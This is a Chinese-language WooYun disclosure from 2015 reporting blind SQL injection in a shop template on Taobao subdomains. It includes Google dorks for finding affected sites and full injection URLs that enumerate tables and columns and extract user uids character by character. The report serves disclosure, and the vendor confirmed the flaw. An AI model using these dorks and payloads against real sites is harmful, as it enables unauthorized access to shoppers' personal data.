漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-094216
漏洞标题:淘宝一系列网站存在多处SQL注入(存在通用性影响数万店铺)
相关厂商:淘宝网
漏洞作者: he1renyagao
提交时间:2015-01-27 17:14
修复时间:2015-03-13 17:16
公开时间:2015-03-13 17:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-13: 细节向公众公开
简要描述:
淘宝某三级域名下的站点使用同一套网站模板,该模板存在SQL注入漏洞,可盲注。
PS: 感谢浩天提供帮助
详细说明:
GOOGLE 关键字:
site:taobao.com inurl:/c/list_goods.php?category_id=
site:taobao.com inurl:/theme/tejia/view/view_article.php?id=
site:taobao.com inurl:/theme/daogou/view/list_goods.php?category_id
都是存在注入点的
使用这套代码的使用量是很大的
过程:
根据上次发现的注入点,认为如果存在注入不应该只有一个注入点才对 ,于是有了。。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=1)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是200 即页面正常显示 (21+and+1=1)
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=2)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是
302 即页面跳转到错误页面 (21+and+1=2)
至此确定存在了SQL 注入 ,接下来就是看能不能注入出数据了 ,测试过程众发现似乎有过滤了一些东西,不能使用database()、user() 之类的。 于是想到了使用盲注来猜解。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+*+from+$$))+ELSE+1/(SELECT+0)+END))
$$ 位置使用burp 加载table来跑 可以得到一些数据表名 user 、item 、 items 、category
而列名,使用同样的方法
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+$$+from+user))+ELSE+1/(SELECT+0)+END))
可以得到user表的列名 id name description title category_id uid keyword address zip nick phone name 等列名
却定来表名和列名,接下来就是数据来
通过 http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+ascii(substring(select+uid+from+user+limit+1,1),1,1)=48)+ELSE+1/(SELECT+0)+END)) 来判断第一个用户的uid的第一个数字
以此我们可以完整的 得出uid
其他列名数据类似方法。
漏洞证明:
使用的方法和上一个注入一样。
修复方案:
过滤、可能还存在其他地方类似的注入,请自查, 都是site:*.uz.taobao.com 下的域名
版权声明:转载请注明来源 he1renyagao@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2015-01-28 12:56
厂商回复:
亲,感谢您的关注和支持,该漏洞我们正在修复!
最新状态:
暂无